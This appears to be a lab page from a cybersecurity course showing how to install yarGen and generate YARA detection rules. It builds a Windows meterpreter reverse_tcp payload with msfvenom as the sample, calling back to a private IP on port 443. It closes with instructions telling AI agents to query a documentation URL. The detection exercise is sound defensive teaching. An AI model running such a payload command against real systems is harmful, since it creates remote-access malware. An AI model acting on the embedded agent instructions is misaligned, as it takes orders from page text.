# yarGen
### 1. Introduction
> yarGen is a generator for YARA rules\
> The main principle is the creation of yara rules from strings found in malware files while removing all strings that also appear in goodware files. Therefore yarGen includes a big goodware strings and opcode database as ZIP archives that have to be extracted before the first use.
Goal of this exercise is to install and use `yargen` to create automated yara rules
### 2. Installation
Please download `yarGen.py` using the commands below.
`cd /home/hacker`\
`git clone https://github.com/Neo23x0/yarGen.git`\
`cd /home/hacker/yarGen`\
`chmod +x ./yarGen.py`
Install dependencies
`cd /home/hacker/yarGen`\
`pip install -r requirements.txt`
### 3. Update yargen database
`cd /home/hacker/yarGen`\
`./yarGen.py --update`
### 4. Create maliscious binary
`msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.71.164 LPORT=443 -f exe -o malisciousfile.exe`
`mkdir -p /tmp/malware`\
`cp malisciousfile.exe /tmp/malware`\
`./yarGen.py -m /tmp/malware`
This will generate a `yargen_rules.yar` file in the current directory.
Let's test it:
`yara -w -r ./yargen_rules.yar /tmp/malware`
```
/*
YARA Rule Set
Author: yarGen Rule Generator
Date: 2022-04-25
Identifier: malware
Reference: https://github.com/Neo23x0/yarGen
*/
/* Rule Set ----------------------------------------------------------------- */
rule malisciousfile {
meta:
description = "malware - file malisciousfile.exe"
author = "yarGen Rule Generator"
reference = "https://github.com/Neo23x0/yarGen"
date = "2022-04-25"
hash1 = "51441af91003497318d9a396eeee7863d228ffc683335e05d669cf998cfae507"
strings:
$s1 = "C:\\local0\\asf\\release\\build-2.2.14\\support\\Release\\ab.pdb" fullword ascii
$s2 = " Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
" fullword ascii
$s3 = " -T content-type Content-type header for POSTing, eg." fullword ascii
$s4 = " -h Display usage information (this message)" fullword ascii
$s5 = " -i Use HEAD instead of GET" fullword ascii
$s6 = " -p postfile File containing data to POST. Remember also to set -T" fullword ascii
$s7 = " This is ApacheBench, Version %s <%s>
" fullword ascii
$s8 = " -r Don't exit on socket receive errors." fullword ascii
$s9 = " Licensed to The Apache Software Foundation, http://www.apache.org/
" fullword ascii
$s10 = " -k Use HTTP KeepAlive feature" fullword ascii
$s11 = " -X proxy:port Proxyserver and port number to use" fullword ascii
$s12 = " %d%% %5I64d" fullword ascii
$s13 = " -H attribute Add Arbitrary header line, eg. 'Accept-Encoding: gzip'" fullword ascii
$s14 = " -v verbosity How much troubleshooting info to print" fullword ascii
$s15 = " -z attributes String to insert as td or th attributes" fullword ascii
$s16 = " -b windowsize Size of TCP send/receive buffer, in bytes" fullword ascii
$s17 = " -e filename Output CSV file with percentages served" fullword ascii
$s18 = " are a colon separated username and password." fullword ascii
$s19 = " -x attributes String to insert as table attributes" fullword ascii
$s20 = " -y attributes String to insert as tr attributes" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 200KB and
8 of them
}
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://cas-cyber.gitbook.io/cas-cybersecurity/malware-analysis/yara/yargen.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
